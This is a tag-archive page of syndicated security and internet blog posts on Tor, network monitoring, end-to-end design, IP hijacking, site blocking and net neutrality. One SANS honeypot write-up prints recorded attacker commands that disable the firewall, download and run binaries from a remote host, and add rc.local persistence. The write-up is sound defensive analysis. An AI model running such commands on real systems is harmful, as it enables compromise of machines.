Posts tagged ‘ip address’

Errata Security: The Pando Tor conspiracy troll

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

Tor, also known as The Onion Router, bounces your traffic through several random Internet servers, thus hiding the source. It means you can surf a website without them knowing who you are. Your IP address may appear to be coming from Germany when in fact you live in San Francisco. When used correctly, it prevents eavesdropping by law enforcement, the NSA, and so on. It’s used by people wanting to hide their actions from prying eyes, from political dissidents, to CIA operatives, to child pornographers.

Recently, Pando (and Internet infotainment site) released a story accusing Tor of being some sort of government conspiracy.

This is nonsense, of course. Pando’s tell-all exposé of the conspiracy contains nothing that isn’t already widely known. We in the community have long joked about this. We often pretend there is a conspiracy in order to annoy uptight Tor activists like Jacob Appelbaum, but we know there isn’t any truth to it. This really annoys me — how can I troll about Tor’s government connections when Pando claims there’s actually truth to the conspiracy?

The military and government throws research money around with reckless abandon. That no more means they created Tor than it means they created the Internet back in the 1970s. A lot of that research is pure research, intended to help people. Not everything the military funds is designed to kill people.

There is no single “government”. We know, for example, that while some in government paid Jacob Appelbaum’s salary, others investigated him for his Wikileaks connections. Different groups are often working at cross purposes — even within a single department.

A lot of people have ties to the government, including working for the NSA. The NSA isn’t some secret police designed to spy on Americans, so a lot of former NSA employees aren’t people who want to bust privacy. Instead, most NSA employees are sincere in making the world a better place — which includes preventing evil governments from spying on dissidents. As Snowden himself says, the NSA is full of honest people doing good work for good reasons. (That they’ve overstepped their bounds is a problem — but that doesn’t mean they are the devil).

Tor is based on open code and math. It really doesn’t matter what conspiracy lies behind it, because we can see the code. It’s like BitCoin — we know there is a secret conspiracy behind it, with the secretive Satoshi Nakamoto owning a billion dollars worth of the coins. But that still doesn’t shake our faith in the code and the math.

Dissidents use Tor — successfully. We know that because the dissidents are still alive. Even if it’s a secret conspiracy by the U.S. government, it still does what its supporters want, helping dissidents fight oppressive regimes. In any case, Edward Snowden, who had access to NSA secrets, trusts his own life to Tor.

Tor doesn’t work by magic. I mention this because the Pando article lists lots of cases where Tor failed to protect people. The reasons were unlikely to have been flaws in Tor itself, but appear to have been other more natural causes. For example, the Silk Road server configuration proves it was open to the Internet as well as through Tor, a rookie mistake that revealed its location. The perfect concealment system can’t work if you sometimes ignore it. It’s like blaming the Pill for not preventing pregnancy because you took it only on some days but not others. Thus, for those of us who know technically how things work, none of the cases cited by Pando shake our trust in Tor.

I’m reasonably technical. I’ve read the Tor spec (though not the code). I play with things like hostile exit nodes. I fully know Tor’s history and ties to the government. I find nothing in the Pando article that is credible, and much that is laughable. I suppose I’m guilty of getting trolled by this guy, but seriously, Pando pretends not to be a bunch of trolls, so maybe this deserves a response.

SANS Internet Storm Center, InfoCON: green: Guest diary: Detecting Suspicious Devices On-The-Fly, (Tue, Nov 25th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

If you apply classic hardening rules (keep the patch level, use an AV, enable the firewall and use them with due diligence), modern operating systems are more and more difficult to compromise today. Extra tools like EMET could also raise the bar. On the other side, networks are more and more populated with unknown/personal devices or devices which provide multiple facilities like storage (NAS), printers (MFP), VoIP, IP camera, …

Being easily compromised, they became a very good target to pivot into the network. They run out-of-the-box, just plug the network/power cables and they are ready to go! A classic vulnerability management process will detect such devices but you still have the risk to miss them if you run a monthly scan! To catch new devices on the fly and to have an immediate idea of their attack surface (example: is there a backdoor present), Im using the following toolbox: Arpwatch, Nmap and OSSEC as the conductor.

Arpwatch is a tool for monitoring ARP traffic on a LAN. It can detect new MAC addresses or pairing changes (IP/MAC). Nmap is the most known port scanner and OSSEC is a log management tool with many features like a built-in HIDS.

A first good news is that Arpwatch log entries are processed by default in OSSEC. It has a great feature called Active-Response which allows to trigger actions (read: execute scripts) in specific conditions. In our case,” />

The above configuration specifies that nmap-scan.sh will be executed with the argument srcip (reported by Arpwatch) on the agent 001 when the rule 7201 or 7202 will match (when a new host or a MAC address change is detected). The nmap-scan.sh script is based on the existing active-response scripts and spawns a Nmap scan:

nmap -sC -O -oG – -oN ${PWD}/../logs/${IP}.log ${IP} | grep Ports: ${PWD}/../logs/gnmap.log

This command will output interesting information in grepable format to the gnmap.log file: the open ports (if any) of the detected IP like in the example below. One line per host will be generated:

Host: 192.168.254.65 (foo.bar.be) Ports: 22/open/tcp//ssh///, 80/open/tcp///,3306/open/tcp/// …

OSSEC is a wonderful tool and can decode this by default. Just configure the gnmap.log as a new events source:

And new alerts will be generated:

2014 Oct 27 17:54:23 (shiva) 192.168.254.1-/var/ossec/logs/gnmap.log
Rule: 581 (level 8) – Host information added.
Host: 192.168.254.65 (foo.bar.be), open ports: 22(tcp) 80(tcp) 3306(tcp)

By using this technique, you will immediately detect new hosts connected to the network (or if an IP address is paired with a new MAC address) and youll get the list of the services running on it as well as the detected operating system (if the fingerprinting is successful). Happy hunting!

Xavier Mertens

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Errata Security: That wraps it up for end-to-end

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

The defining feature of the Internet back in 1980 was “end-to-end”, the idea that all the intelligence was on the “ends” of the network, and not in middle. This feature is becoming increasingly obsolete.

This was a radical design at the time. Big corporations and big government still believed in the opposite model, with all the intelligence in big “mainframe” computers at the core of the network. Users would just interact with “dumb terminals” on the ends.

The reason the Internet was radical was the way it gave power to the users. Take video phones, for example. AT&T had been promising this since the 1960s, as the short segment in “2001 A Space Odyssey” showed. However, getting that feature to work meant replacing all the equipment inside the telephone network. Telephone switches would need to know the difference between a normal phone call and a video call. Moreover, there could be only one standard, world wide, so that calling Japan or Europe would work with their video telephone systems. Users were powerless to develop video calling on their own — they would have to wait for the big telcom monopolies to develop it, however long it took.

That changed with the Internet. The Internet carries packets without knowing their content. Video calling with Facetime or Skype or LINE is just an app, from your iPhone or Android or PC. People keep imagining new applications for the Internet every day, and implement them, without having to change anything in core Internet routing hardware.

I’ve used Facetime, Skype, and LINE to talk to people in Japan. That’s because there is no real international standard for video calling. Each person I call requires me to install whichever app they are using. Traditional thinking is that government ought to create standards, so that every app would be compatible with every other app, so that I could Skype from Windows to somebody’s iPhone using Facetime. This tradition is nonsense. If we waited for government standards, it’d take forever. Teenagers who heavily use video today would be grown up with kids of their own before government got around to creating the right standard. Lack of standards means freedom to innovate.

Such freedom was almost not the case. You may have heard of something called the “OSI 7 Layer Model”. Everything you know about that model is wrong. It was an attempt by Big Corporations and Big Government to enforce their model of core-centric networking. It demanded such things as a “connection oriented network protocol”, meaning smart routers rather than the dumbs ones we have today. It demanded that applications be standardized, so that there would be only one video conferencing standard, for example. Governments in US, Japan, and Europe mandated that the computers they bought supporting OSI conformant protocols. (The Internet’s TCP/IP protocols do not conform to the OSI model.) Such rules were on the book through into the late 1990s dot-com era, when many in government still believed that the TCP/IP Internet was just a brief experiment on the way to a Glorious Government OSI Internetwork.

The Internet did have standards, of course, but they were developed in the opposite manner. Individuals innovated first, on the ends of the network, developing apps. Only when such apps became popular did they finally get documented as a “standard’. In other words, Internet standards we more de facto than de jure. People innovated first, on their own ends of the network, and the infrastructure and standards caught up later.

But here’s the thing: the Internet ideal of end-to-end isn’t perfect, either. There are reasons why not all innovation happens on the ends.

Take your home network as an example. The way your home likely works is that you have a single home router with cable/fiber/DSL on one side talking to the Internet, and WiFi on the other side talking to the devices in your home. Attached to your router you have a desktop computer, a couple notebooks, an iPad, your phones, an Xbox/Playstation, and your TV.

In the true end-to-end model, all these devices would be on the Internet directly — that they could be “pinged” from the Internet. In today’s reality, though, that’s not the way things work. Your home router is a firewall. It blocks incoming connections, so that devices in your home can connect outwards, but nothing on the Internet can connect inwards. This fundamentally breaks the ideal of end-to-end, as a smart device sits in the network controlling access to the ends.

This is done for two reasons. The first is security, so that hackers can’t hack the devices in your home. Blocking inbound traffic blocks 99% of hacker attacks against devices.

The second reason for smart home routers is the well-known limitation on Internet addresses: there are only 4 billion of them. However, there are more than 4 billion devices connected to the Internet. This fix this, your home router does address translation. Your router has only a single public Internet address. All the devices in your home have private addresses that wouldn’t work on the Internet. As packets flow in/out of your home, your router transparently changes the private addresses in the packets into the single public address.

Thus, when you google “what’s my IP address“, you’ll get a different address than your local machine. Your machine will have a private address like 10.x.x.x or 192.168.x.x, but servers on the Internet won’t see that — they’ll see the public address you’ve been assigned by your ISP.

According to Gartner, nearly billion smarthphones were sold in 2013. These are all on the Internet. That represents a quarter of the Internet address space used up in only a single year. Yet, virtually none of them are assigned real Internet addresses. Almost all of them are behind address translators — not the small devices like you have in your home, but massive translators that can handle millions of simultaneous devices.

The consequence is this: there are more devices with private addresses, that must go through translators, than there are devices with public addresses. In other words, less than 50% of the Internet is end-to-end.

The “address space exhaustion” of tradition Internet addresses inspired an update to the protocol to use larger addresses, known as IPv6. It uses 128-bit addresses, or 4 billion times 4 billion times 4 billion times 4 billion. This is enough to assign a unique address to all the grains of sand on all the beaches on Earth. It’s enough to restore end-to-end access to every device on the Internet, times billions and billlions.

My one conversation with Vint Cerf (one of the key Internet creators) was over this address space issue. Back in 1992, every Internet engineer knew for certain that the Internet would run out of addresses by around the year 2000. Every engineer knew this would cause the Internet to collapse. At the IETF meeting, I tried to argue otherwise. I used the Simon-Ehrlich Wager as an analogy. Namely, the 4 billion addresses weren’t a fixed resource, because we would become increasingly efficient at using them. For example, “dynamic” addresses would use space more efficiently, and translation would reuse addresses.

Cerf’s response was the tautology “but that would break the end-to-end principle”.

Well, yes, but no such principle should be a straightjacket. The end-to-end principle is already broken by hackers. Even with IPv6, when all your home devices have a public rather than private address on the Internet, you still want a firewall breaking the end-to-end principle blocking inbound connections. Once you’ve decided to firewall a network, it no longer matters whether it’s using IPv6 or address translation of private addresses. Indeed, address translation is better for firewalling, as it defaults to “fail close”. That means if a failure occurs, all communication is blocked. With IPv6, firewalls become “fail open”, where failures allow communication to continue.

Firewalls are only the start in breaking end-to-end. It’s the “cloud” where we see a radical reversion back to old principles.

Your phone is no longer a true “end” of the network. Sure, your phone has a powerful processor that’s faster than supercomputers of the last decade, but that power is used primarily for display not for computation. Your data and computation is instead done in the cloud. Indeed, when you lose or destroy your phone, you simply buy a new one and “restore” it form the cloud.

Thus, we are right back to the old world of smart core network with “mainframes”, and “dumb terminals” on the ends. That your phone has supercomputer power doesn’t matter — it still does just what it’s told by the cloud.

But the last nail in the coffin to the “end-to-end” principle is the idea of “net neutrality”. While many claim it’s a technical concept, it’s just a meaningless political slogan. Congestion is an inherent problem of the Internet, and no matter how objectively you try to solve it, it’ll end up adversely affecting somebody — somebody who will then lobby politicians to rule in their favor. The Comcast-NetFlix issue is a good example where the true technical details are at odds with the way this congestion issue has been politicized. Things like “fast-lanes” are everywhere, from content-delivery-networks to channelized cable/fiber. Rhetoric creates political distinctions among various “fast-lanes” when there are no technical distinctions.

This politicization of the Internet ends the personal control over the Internet that was promised by end-to-end. Instead of being able to act first and asking for forgiveness later, you must first wait for permission from Big Government. Instead of being able to create your own services, you must wait for Big Corporations (the only ones that can afford lawyers to lobby government) to deliver those services to you.

Conclusion

We aren’t going to regress completely to the days of mainframes, of course, but we’ve given up much of the territory of individualistic computing. In some ways, this is a good thing. I don’t want to manage my own data, losing it when a hard drive crashes because I forgot to back it up. In other ways, it’s a bad thing. The more we regulate the Internet to insure good things, the more we stop innovations that don’t fit within our preconceived notions. Worse, the more it’s regulated, the more companies have to invest in lobbying the government for favorable regulation, rather than developing new technology..

TorrentFreak: If Illegal Sites Get Blocked Accidentally, Hard Luck Says Court

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

blockedThe movie and music industries have obtained several High Court orders which compel UK ISPs to block dozens of websites said to facilitate access to copyright-infringing content. Recently, however, they have been joined by those seeking blockades on trademark grounds.

The lead case on this front was initiated by Cartier and Mont Blanc owner Richemont. The company successfully argued that several sites were infringing on its trademarks and should be blocked by the UK’s leading ISPs.

The case is important not only to trademark owners but also to those operating in the file-sharing arena since the High Court is using developments in one set of cases to determine the outcome of legal argument in the other.

The latest ruling concerns potential over-blocking. In some cases target sites move to IP addresses that are shared with other sites that are not covered by an injunction. As a result, these third-party sites would become blocked if ISPs filter their IP addresses as ordered by the Court.

To tackle this problem Richemont put forward a set of proposals to the Court. The company suggested that it could take a number of actions to minimize the problem including writing to the third-party sites informing them that a court order is in force and warning them that their domains could become blocked. The third party sites could also be advised to move to a new IP address.

Complicating the issue is the question of legality. While third-party sites aren’t mentioned in blocking orders, Richemont views some of them as operating unlawfully. When the company’s proposals are taken as a package and sites are operating illegally, Richemont believes ISPs should not be concerned over “collateral damage.”

Counsel for the ISPs disagreed, however, arguing that the Court had no jurisdiction to grant such an order. Mr Justice Arnold rejected that notion and supported Richemont’s efforts to minimize over-blocking in certain circumstances.

“The purpose of Richemont’s proposal is to ensure that the [blocking] order is properly targeted, and in particular to ensure that it is as effective as possible while avoiding what counsel for Richemont described as ‘collateral damage’ to other lawful website operators which share the same IP address,” the Judge wrote.

“If the websites are not engaged in lawful activity, then the Court need not be concerned about any collateral damage which their operators may suffer. It is immaterial whether the Court would have jurisdiction, or, if it had jurisdiction, would exercise it, to make an order requiring the ISPs to block access to the other websites.”

The ISPs further argued that the Court’s jurisdiction to adopt Richemont’s proposals should be limited to sites acting illegally in an intellectual property rights sense. The argument was rejected by the Court.

Also of note was the argument put forward by the ISPs that it is the Court’s position, not anyone else’s, to determine if a third-party site is acting illegally or not. Justice Arnold said he had sympathy with the submission, but rejected it anyway.

“As counsel for Richemont submitted, the evidence shows that, in at least some cases, it is perfectly obvious that a particular website which shares an IP address with a Target Website is engaged in unlawful activity. Where there is no real doubt about the matter, the Court should not be required to rule,” the Judge wrote.

“Secondly, and perhaps more importantly, Richemont’s proposal gives the operators of the affected websites the chance either to move to an alternative server or to object before the IP address is blocked. If they do object, the IP address will not be blocked without a determination by the Court.”

In summary, any third-party sites taken down after sharing an IP address with a site featured in a blocking order will have no sympathy from the High Court, if at Richemont’s discretion they are acting illegally. The fact that they are not mentioned in an order will not save them, but they will have a chance to appeal before being blocked by UK ISPs.

“This action is about protecting Richemont’s Maisons and its customers from the sale of counterfeit goods online through the most efficient means, it is not about restricting freedom of speech or legitimate activity,” the company previously told TF.

“When assessing a site for blocking, the Court will consider whether the order is proportionate – ISP blocking will therefore only be used to prevent trade mark infringement where the Court is satisfied that it is appropriate to do so.”

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Liam Neeson Downloaders Face Anti-Piracy Shakedown

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

File-sharers in the United States, Germany and the UK are particularly familiar with the tactics of so-called copyright trolls. In recent years the lucrative nature of the business has attracted many companies, all out to turn piracy into profit.

Most countries have managed to avoid the attentions of these outfits, Sweden, the spiritual home of The Pirate Bay, included. However, in a surprise move the Scandinavian country has now appeared on the file-sharing lawsuit radar.

Along with Universal Pictures and Studio Canal, Check Entertainment is one of the companies behind the 2014 Liam Neeson movie, Non-Stop. According to latest figures from Box Office Mojo it has done very well, bringing in excess of $222 million on a $50 million budget.

Nevertheless, according to Dagens Media, Check Entertainment has hired lawfirm Nordic Law to go to court in Sweden to obtain the identities of individuals said to have downloaded and shared the action thriller.

The U.S.-based company has targeted subscribers of five local Internet service providers – Com Hem, Bredbandsbolaget, Banhof, Telia Sonera and Telenor – with the aim of forcing them to turn over the names and addresses of 12 of their Internet subscribers. Data on the alleged file-sharers was captured by German anti-piracy outfit Excipio.

At this point Check Entertainment says it wants to “investigate and prosecute” the subscribers for alleged copyright infringement but if cases in the rest of the world are any yardstick the aim will be a cash settlement, not a full court case.

Interestingly, one ISP from the five has indicated that its customers do not have to be concerned about possible lawsuits or shakedowns.

Service provider Banhof, a company long associated with subscriber privacy, says it is currently the only ISP in the Swedish market that does not store data on its customers’ Internet activities.

The development dates back to April when the EU Court of Justice declared the Data Retention Directive to be invalid. In response, many Swedish ISPs stopped storing data but since then most have reversed their decision to comply with apparent obligations under the Swedish Electronic Communications Act. Banhof did not, however.

This means that even if the ISP is ordered by the court to reveal which subscribers were behind a particular IP address at a certain time, it has no data so simply cannot comply.

“We have no such data. We turned off data storage on the same day that the EU judgment was handed down,” Banhof CEO Jon Karlung told Dagens Media.

While Sweden has a long tradition of file-sharing and the state regularly prosecutes large scale file-sharers, actions against regular sharers of a single title are extremely rare, ‘trolling’ even more so.

“It’s pretty rare,” Karlung says. “It has been quite a long time since it happened last.”

The big question now is whether the courts will be sympathetic to Check Entertainment’s complaint.

“We have submitted [our case] to the district court and now we want to see what the service providers say in response,” Nordic Law’s Patrick Andersson concludes.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Krebs on Security: Network Hijackers Exploit Technical Loophole

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Spammers have been working methodically to hijack large chunks of Internet real estate by exploiting a technical and bureaucratic loophole in the way that various regions of the globe keep track of the world’s Internet address ranges.

Last week, KrebsOnSecurity featured an in-depth piece about a well-known junk email artist who acknowledged sending from two Bulgarian hosting providers. These two providers had commandeered tens of thousands of Internet addresses from ISPs around the globe, including Brazil, China, India, Japan, Mexico, South Africa, Taiwan and Vietnam.

For example, a closer look at the Internet addresses hijacked by one of the Bulgarian providers — aptly named “Mega-Spred” with an email contact of “abuse@grimhosting” — shows that this provider have been slowly  gobbling up far-flung IP address ranges since late August 2014.

This table, with data from the RIPE NCC -- of the regional Internet Registries, shows IP address hijacking activity by Bulgarian host Mega-Spred.

This table, with data from the RIPE NCC — of the regional Internet Registries, shows IP address hijacking activity by Bulgarian host Mega-Spred.

According to several security and anti-spam experts who’ve been following this activity, Mega-Spred and the other hosting provider in question (known as Kandi EOOD) have been taking advantage of an administrative weakness in the way that some countries and regions of the world keep tabs on the IP address ranges assigned to various hosting providers and ISPs.

IP address hijacking is hardly a new phenomenon. Spammers sometimes hijack Internet address ranges that go unused for periods of time. Dormant or “unannounced” address ranges are ripe for abuse partly because of the way the global routing system works: Miscreants can “announce” to the rest of the Internet that their hosting facilities are the authorized location for given Internet addresses. If nothing or nobody objects to the change, the Internet address ranges fall into the hands of the hijacker.

Experts say the hijackers also are exploiting a fundamental problem with record-keeping activities of RIPE NCC, the regional Internet registry (RIR) that oversees the allocation and registration of IP addresses for Europe, the Middle East and parts of Central Asia. RIPE is one of several RIRs, including ARIN (which handles mostly North American IP space) and APNIC (Asia Pacific), LACNIC (Latin America) and AFRINIC (Africa).

Ron Guilmette, an anti-spam crusader who is active in numerous Internet governance communities, said the problem is that a network owner in RIPE’s region can hijack Internet addresses that belong to network owners in regions managed by other RIRs, and if the hijackers then claim to RIPE that they’re the rightful owners of those hijacked IP ranges, RIPE will simply accept that claim without verifying or authenticating it.

Worse yet, Guilmette and others say, those bogus entries — once accepted by RIPE — get exported to other databases that are used to check the validity of global IP address routing tables, meaning that parties all over the Internet who are checking the validity of a route may be doing so against bogus information created by the hijacker himself.

“RIPE is now acutely aware of what is going on, and what has been going on, with the blatantly crooked activities of this rogue provider,” Guilmette said. “However, due to the exceptionally clever way that the proprietors of Mega-Spred have performed their hijacks, the people at RIPE still can’t even agree on how to even undo this mess, let alone how to prevent it from happening again in the future.”

And here is where the story perhaps unavoidably warps into Geek Factor 5. For its part, RIPE said in an emailed statement to KrebsOnSecurity that the RIPE NCC has no knowledge of the agreements made between network operators or with address space holders”

“It’s important to note the distinction between an Internet Number Registry (INR) and an Internet Routing Registry (IRR). The RIPE Database (and many of the other RIR databases) combine these separate functionalities. An INR records who holds which Internet number resources, and the sub-allocations and assignments they have made to End Users.

On the other hand, an IRRcontains route and other objects — which detail a network’s policies regarding who it will peer with, along with the Internet number resources reachable through a specific ASN/network. There are 34 separate IRRs globally — therefore, this isn’t something that happens at the RIR level, but rather at the Internet Routing Registry level.”

“It is not possible therefore for the RIRs to verify the routing information entered into Internet Routing Registries or monitor the accuracy of the route objects,” the organization concluded.

Guilmette said RIPE’s response seems crafted to draw attention away from RIPE’s central role in this mess.

“That it is somewhat disingenuous, I think for this RIPE representative to wave this whole mess off as a problem with the
IRRs when in this specific case, the IRR that first accepted and then promulgated these bogus routing validation records was RIPE,” he said.

RIPE notes that network owners can take help reduce the occurrence of IP address hijacking by taking advantage of Resource Certification (RPKI), a free service to RIPE members and non-members that allows network operators to request a digital certificate listing the Internet number resources they hold. This allows other network operators to verify that routing information contained in this system is published by the legitimate holder of the resources. In addition, the system enables the holder to receive notifications when a routing prefix is hijacked, RIPE said.

While RPKI (and other solutions to this project, such as DNSSEC) have been around for years, obviously not all network providers currently deploy these security methods. Erik Bais, a director at A2B Internet BV — a Dutch ISP — said while broader adoption of solutions like RPKI would certainly help in the long run, one short-term fix is for RIPE to block its Internet providers from claiming routes in address ranges managed by other RIRs.

“This is a quick fix, but it will break things in the future for legitimate usage,” Bais said.

According to RIPE, this very issue was discussed at length at the recent RIPE 69 Meeting in London last week.

“The RIPE NCC is now working with the RIPE community to investigate ways of making such improvements,” RIPE said in a statement.

This is a complex problem to be sure, but I think this story is a great reminder of two qualities about Internet security in general that are fairly static (for better or worse): First, much of the Internet works thanks to the efforts of a relatively small group of people who work very hard to balance openness and ease-of-use with security and stability concerns. Second, global Internet address routing issues are extraordinarily complex — not just in technical terms but also because they also require coordination and consensus between and among multiple stakeholders with sometimes radically different geographic and cultural perspectives. Unfortunately, complexity is the enemy of security, and spammers and other ne’er-do-wells understand and exploit this gap as often as possible.

SANS Internet Storm Center, InfoCON: green: Lessons Learn from attacks on Kippo honeypots, (Mon, Nov 10th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

A number of my fellow Handlers have discussed Kippo [1], a SSH honeypot that can record adversarial behaviour, be it human or machine. Normal behaviour against my set of Kippo honeypots is randomly predictable; a mixture of known bad IP ranges, researchers or from behind TOR scanning and probing, would be attackers manually entering information from their jump boxes or home machines.

What caught my eye was a number of separate brute force attacks that succeeded and then manifested the same behaviour, all within a single day.Despite the IP addresses of the scans, the pickup file locations and the downloaded file names being different the captured scripts from the Kippo logs and, more importantly in this case, the hashes were identical for the two files [2] [3] that were retrieved and attempted to run on Kippos fake system

So what? you may ask. I like to draw lessons learnt from this type of honeypot interaction which help provide some tactical and operational intelligence that can be passed other teams to use. Dont limit this type of information gather to just the security teams, for example our friends in audit and compliance need to know what common usernames and passwords are being used in these types of attacks to keep them current and well advised. A single line note on a daily report to the stakeholders for security may being in order if your organisation is running internet facing Linux systems with SSH running port TCP 22 for awareness.

Here are some of the one I detailed that would be passed to the security team.

1) The password 12345 isnt very safe who knew? (implied sarcasm)
2) The adversary was a scripted session with no error checking (see the scripts actions below)
3) The roughly two hours attacks from each unique IP address shows a lack of centralised command and control
4) The malware dropped was being reported in VirusTotal a day before I submitted my copies, so this most likely is a relatively new set of scanning and attacks
5) The target of the attack is to compromise Linux systems
6) The adversary hosting file locations are on Windows systems based in China running HFS v2.3c 291 [4] a free windows web server on port 8889 which has a known Remote Command Execution flaw the owner should probably looked at updating.
7) Running static or dynamic analysis of the captured Linux binaries provided a wealth of further indicators
8) The IP addresses of the scanning and host servers
9) And a nice list of usernames and passwords to be added to the never, ever use these of anything (root/root, root/password, admin/admin etc)

Id normally offer up any captured binaries for further analysis, if the teams had the capacity to do this or dump them through an automated sandbox like Cuckoo [5] to pick out the more obvious indicators of compromise or further pieces of information to research (especially hard coded commands, IP addresses, domain names etc)

If you have any other comments on how to make honeypots collections relevant, please drop me a line!”>Recorded commands by Kippo
service iptables stop
wget hxxp://x.x.x.x:8889/badfile1
chmod u+x badfile1
./ badfile1
cd /tmp
tmp# wget hxxp://x.x.x.x:8889/badfile2
chmod u+x badfile2
./ badfile2
bash: ./ badfile2: command not found
/tmp# cd /tmp
/tmp# echo cd /root//etc/rc.local
cd /root//etc/rc.local
/tmp# echo ./ badfile1/etc/rc.local
./ badfile1/etc/rc.local
/tmp# echo ./ badfile2/etc/rc.local
./ux badfile2/etc/rc.local
/tmp# echo /etc/init.d/iptables stop/etc/rc.local
/etc/init.d/iptables stop/etc/rc.local

[1] Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker. https://github.com/desaster/kippo

[2] File hash 1 0601aa569d59175733db947f17919bb7 https://www.virustotal.com/en/file/22ec5b35a3b99b6d1562becb18505d7820cbcfeeb1a9882fb7fc4629f74fbd14/analysis/
[3] File hash 2 60ab24296bb0d9b7e1652d8bde24280b https://www.virustotal.com/en/file/f84ff1fb5cf8c0405dd6218bc9ed1d3562bf4f3e08fbe23f3982bfd4eb792f4d/analysis/

[4] http://sourceforge.net/projects/hfs/
[5] http://www.cuckoosandbox.org/

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Errata Security: This Vox NetNeutrality article is wrong

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

There is no reasoned debate over NetNeutrality because the press is so biased. An example is this article by Timothy B. Lee at Vox “explaining” NetNeutrality. It doesn’t explain, it advocates.

1. Fast Lanes

Fast-lanes have been an integral part of the Internet since the beginning. Whenever somebody was unhappy with their speeds, they paid money to fix the problem. Most importantly, Facebook pays for fast-lanes, contrary to the example provided.

One prominent example of fast-lanes is “channels” in the local ISP network to avoid congestion. This allows them to provide VoIP and streaming video over their own private TCP/IP network that won’t be impacted by the congestion that everything else experiences. That’s why during prime-time (7pm to 10pm), your NetFlix streams are low-def (to reduce bandwidth), while your cable TV video-on-demand are hi-def.

Historically, these channels were all “MPEG-TS”, transport streams based on the MPEG video standard. Even your Internet packets would be contained inside the MPEG streams on channels.

Today, the situation is usually reversed. New fiber-optic services have TCP/IP network everywhere, putting MPEG streams on top of TCP/IP. They just separate the channels into their private TCP/IP network that doesn’t suffer congestion (for voice and video-on-demand), and the public Internet access that does. Their services don’t suffer congestion, other people’s services do.

The more important fast-lanes are known as “content delivery networks” or “CDNs”. These companies pay ISPs to co-locate servers on their network, putting servers in every major city. Companies like Facebook then pay the CDNs to host their data.

If you monitor your traffic, you’ll see that the vast majority goes to CDNs located in your city. When you access different, often competing companies like Facebook and Apple, your traffic may in fact go to the same IP address of the CDN server.

Smaller companies that cannot afford CDNs most host their content in just a couple locations. Since these locations are thousands of miles from most of their customers, access is slower than CDN hosted content like Facebook. Pay-for-play has, with preferred and faster access, has been an integral part of the Internet since the very beginning.

This demonstrates that the Vox example of Facebook is a complete lie. Their worst-case scenario already exists, and has existed since before the dot-com era even started, and has enabled competition and innovation rather than hindering it.

2. Innovation

Vox claims: “Advocates say the neutrality of the internet is a big reason there has been so much online innovation over the last two decades“.

No, it’s opponents who claim the lack of government regulation is the reason there has been so much online innovation in the last decades.

NetNeutality means sweeping government regulation that forces companies to ask permission first before innovating. NetNeutrality means spending money lobbying for government for special rules, surviving or failing based on the success of paying off politicians rather than surviving or failing based on the own merits.

Take GoGo Inflight broadband Internet service on airplanes. They block NetFlix in favor of their own video streaming service. This exactly the sort of thing that NetNeutrality regulations are supposed to block. However, it’s technically necessary. A single person streaming video form NetFlix would overload the connection for everyone else. To satisfy video customers, GoGo puts servers on the plane for its streaming service — allowing streaming without using the Internet connection to the ground.

If NetNeutrality became law, such things would be banned. But of course, since that would kill Internet service on airplanes, the FCC would immediately create rules to allow this. But then everyone would start lobbying the FCC for their own exceptions. In the end, you’d have the same thing with every other highly regulated industry, where companies with the most lobbying dollars win.

Innovation happens because companies innovate first and ask for permission (or forgiveness) later. A few years ago, Comcast throttled BitTorrent traffic during prime time. NetNeutrality proponents think this is bad, and use it as an example of why we need regulation. But no matter how bad it is, it’s a healthy sign of innovation. Not all innovations are good, sometimes companies will try things, realize they are bad, then stop doing them. Under NetNeutrality regulations, nothing bad will happen ever again, because government regulators won’t allow it. But that also means good innovations won’t happen either — companies won’t be able to freely try them out without regulators putting a stop to it.

Right now, you can start a company like Facebook without spending any money lobbying the government. In the NetNeutrality future, that will no longer be possible. A significant amount of investor money will go toward lobbying the government for favorable regulation, to ask permission.

3. What’s Taking So Long

Vox imagines that NetNeutality is such a good idea that the only thing stopping it is technicalities.

The opposite is true. The thing stopping NetNeutrality is that it’s a horrible idea that kills innovation. It’s not a technical idea, but a political one. It’s pure left-wing wing politics that demands the government run everything. The thing stopping it is right-wing politics that wants the free-market to run things.

The refusal of Vox to recognize that this is a left-wing vs. right-wing debate demonstrates their overwhelming political bias on this issue.

4. FCC Bypassing Congress

The Internet is new and different. If regulating it like a utility is a good idea, then it’s Congress who should pass a law to do this.

What Obama wants to do is bypass congress and seize control of the Internet himself.

5. Opponent’s arguments

Vox gets this partly right, but fundamentally wrong.

The fundamental argument by opponents is that nothing bad is happening now. None of the evil scenarios of what might happen are actually happening now.

Sure, sometimes companies do bad things, but the market immediately corrects. That’s the consequence of permission-free innovation: innovate first, and ask for permission (or forgiveness) later. That sometimes companies have to ask for forgiveness is a good sign.

Let’s wait until Comcast actually permanently blocks content, or charges NetFlix more than other CDNs, or any of the other hypothetical evils, then let’s start talking about the government taking control.

6. Red Tape

Strangling with red-tape isn’t a binary proposition.

What red-tape means is that network access becomes politicized, as only those with the right political connections get to act. What red-tape means is that only huge corporations can afford the cost. If you like a world dominated by big, connected corporations, then you want NetNeutrality regulations.

While it won’t strangle innovation, it’ll drastically slow it down.

7. YouTube

Vox claims that startups like YouTube would have difficulty getting off the ground with NetNeutrality regulation. The opposite is true: companies like YouTube would no longer be able to get off the ground without lobbying the government for permission.

8. Level Playing Field

Vox description of the NetFlix-Comcast situation is completely biased on wrong, taking NetFlix’s and leftist description at face value. It’s not true.

